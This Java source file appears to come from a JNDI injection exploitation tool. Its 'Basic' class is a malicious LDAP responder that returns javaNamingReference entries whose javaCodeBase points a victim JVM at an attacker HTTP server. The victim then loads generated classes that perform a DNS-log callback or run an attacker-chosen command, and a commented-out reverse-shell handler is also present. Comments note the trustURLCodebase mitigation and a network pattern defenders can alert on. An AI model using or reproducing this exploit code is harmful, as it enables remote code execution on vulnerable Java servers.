package net.roboterh.injector.gadgets;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import net.roboterh.injector.enums.PayloadEnum;
import net.roboterh.injector.servers.HTTPServer;
import net.roboterh.injector.templates.CommandTemplate;
import net.roboterh.injector.templates.DnsLogTemplate;
import net.roboterh.injector.utils.PayloadUtils;
import org.apache.log4j.LogManager;
import org.apache.log4j.Logger;
import java.net.URL;
/*
Basic way
Requirement:
com.sun.jndi.ldap.object.trustURLCodebase = true
Explanation:
sets the `javaCodeBase` attribute to a remote server so that a particular class can be obtained from it
*/
/**
 * "Basic" JNDI-reference gadget: answers an intercepted LDAP search with an entry
 * whose {@code javaCodeBase}/{@code javaFactory} attributes point the requesting
 * JNDI client at a class served by {@link HTTPServer}.
 *
 * <p>As the file header states, a client JVM only follows such a reference when
 * {@code com.sun.jndi.ldap.object.trustURLCodebase} is {@code true}; current JDKs
 * ship it as {@code false}, which is the primary mitigation on the client side.
 * On the wire, a search-result entry carrying {@code objectClass=javaNamingReference}
 * together with an HTTP {@code javaCodeBase} is the pattern defenders can alert on.
 *
 * <p>Per-request state ({@link #params}, {@link #payload}, {@link #className}) lives
 * in instance fields and is overwritten on every call, so a single instance is not
 * safe to share between concurrent searches; whether the listener does so is not
 * visible from this file.
 */
public class Basic implements LDAPService {
    private static final Logger logger = LogManager.getLogger(Basic.class);
    // Arguments extracted from the base DN by argsHandler(); a single element for
    // both payloads handled below. Left untouched when the selected payload has no case.
    private String[] params;
    // Payload chosen by argsHandler(); stays null when no PayloadEnum name occurs in the base DN.
    private PayloadEnum payload;
    // Class name returned by the template in generateHandler(), or "" for an unhandled payload.
    private String className;

    /**
     * Builds the reference entry for one intercepted search and sends it back.
     *
     * <p>{@link #argsHandler} and {@link #generateHandler} run before the try block,
     * so a base DN that names no payload surfaces as a {@code NullPointerException}
     * from {@code payload.name()} and propagates to the caller rather than being logged.
     *
     * @param result the intercepted search to answer
     * @param baseDN the search base; also carries the payload name and its arguments
     */
    public void sendResult(InMemoryInterceptedSearchResult result, String baseDN) {
        argsHandler(baseDN);
        generateHandler();
        try {
            Entry entry = new Entry(baseDN);
            // The resolved URL is only used for the log line; the entry itself carries
            // HTTPServer.codeBase unchanged. A malformed codebase throws here, inside the catch.
            URL url = new URL(new URL(HTTPServer.codeBase), className + ".class");
            logger.info(String.format("Send LDAP reference result for %s redirecting to %s ...", baseDN, url));
            // javaClassName is a placeholder; javaFactory names the class the client will
            // fetch from javaCodeBase. With an unhandled payload javaFactory is "".
            entry.addAttribute("javaClassName", "foo");
            entry.addAttribute("javaCodeBase", HTTPServer.codeBase);
            entry.addAttribute("javaFactory", className);
            entry.addAttribute("objectClass", "javaNamingReference");
            result.sendSearchEntry(entry);
            // Message ID 0 is passed literally rather than echoing the request's ID.
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        } catch (Exception e) {
            // Broad catch: any failure above is reduced to a single info-level line
            // with no stack trace and no cause, so send errors are easy to miss in logs.
            logger.info(e.getMessage());
        }
    }

    /**
     * Selects the payload from the base DN and extracts its arguments.
     *
     * <p>Every {@link PayloadEnum} constant whose name occurs case-insensitively
     * anywhere in {@code baseDN} is considered in declaration order; the loop has no
     * {@code break}, so when several names occur the last one wins. Only the
     * {@code DnsLog} and {@code Command} names populate {@link #params}; any other
     * matching constant leaves {@code params} as it was.
     *
     * @param baseDN the search base carrying the payload name and its arguments
     */
    public void argsHandler(String baseDN) {
        for (PayloadEnum payloadEnum : PayloadEnum.values()) {
            if (baseDN.toLowerCase().contains(payloadEnum.name().toLowerCase())) {
                payload = payloadEnum;
                logger.info(String.format("Payload Selected is %s ...", payload.name()));
                // Dispatch on the enum's name() string; the case labels must match the
                // constant names exactly.
                switch (payload.name()) {
                    case "DnsLog":
                        // The argument is everything after the last '/' of the base DN.
                        String link = baseDN.substring(baseDN.lastIndexOf("/") + 1);
                        logger.info(String.format("Received link is %s ...", link));
                        params = new String[]{link};
                        break;
                    case "Command":
                        // Extraction is delegated to PayloadUtils; its parsing rules are not visible here.
                        String cmd = PayloadUtils.getCmdFromBase(baseDN);
                        logger.info(String.format("Received command is %s ...", cmd));
                        params = new String[]{cmd};
                        break;
                    // case "ReverseShell":
                    // // add ip and port of remote machine
                    // int lastIndex = baseDN.lastIndexOf("/");
                    // int secondIndex = baseDN.lastIndexOf("/", lastIndex - 1);
                    // String ip = baseDN.substring(secondIndex + 1, lastIndex);
                    // String port = baseDN.substring(lastIndex + 1);
                    // logger.info(String.format("Received ip is %s and port is %s ...", ip, port));
                    // params = new String[]{ip, port};
                    // break;
                }
            }
        }
    }

    /**
     * Instantiates the template for the selected payload and records its class name.
     *
     * <p>Relies on {@link #argsHandler} having run first: {@code payload.name()} throws
     * {@code NullPointerException} when no payload was selected, and {@code params[0]}
     * throws when the selected payload never filled {@code params}. What
     * {@code addCache()} registers, and with whom, is not visible in this file.
     */
    public void generateHandler() {
        switch (payload.name()) {
            case "DnsLog":
                DnsLogTemplate dnsLogTemplate = new DnsLogTemplate(params[0]);
                // Register the generated class before exposing its name.
                dnsLogTemplate.addCache();
                className = dnsLogTemplate.getClassName();
                break;
            case "Command":
                CommandTemplate commandTemplate = new CommandTemplate(params[0]);
                // Register the generated class before exposing its name.
                commandTemplate.addCache();
                className = commandTemplate.getClassName();
                break;
            default:
                // Unhandled payload: sendResult() still emits a reference, with an empty javaFactory.
                className = "";
        }
    }
}